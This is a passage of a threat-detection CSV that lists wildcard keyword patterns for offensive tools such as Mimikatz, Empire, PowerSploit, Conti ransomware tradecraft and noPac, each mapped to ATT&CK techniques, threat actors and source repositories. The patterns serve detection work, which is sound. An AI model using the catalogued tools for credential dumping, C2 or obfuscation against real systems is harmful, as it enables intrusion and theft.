TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*Invoke-MetaTwin*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*InvokeMeter.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Invoke-MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" 
+"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz-old*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Invoke-MITM6*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-ModifiableProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MonitorCredSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. 
network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-MS16*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NamedPipePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NanoDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-NanoDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NetRipper*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Invoke-NetworkAdaptersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NetworkRelay*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Nightmare -DLL *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-Nightmare -NewUser*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-Nightmare*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-noPac.*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" +"*Invoke-NTLMAuth.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-Ntsd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Obfuscation -ScriptPath *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-Obfuscation*","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3290","733","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" +"*Invoke-Obfuscation.psd1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-OpenInboxFinder*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-OpenOWAMailboxInBrowser*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Oxidresolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-P0wnedshell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-P0wnedshellx86*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-PacketKnock*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
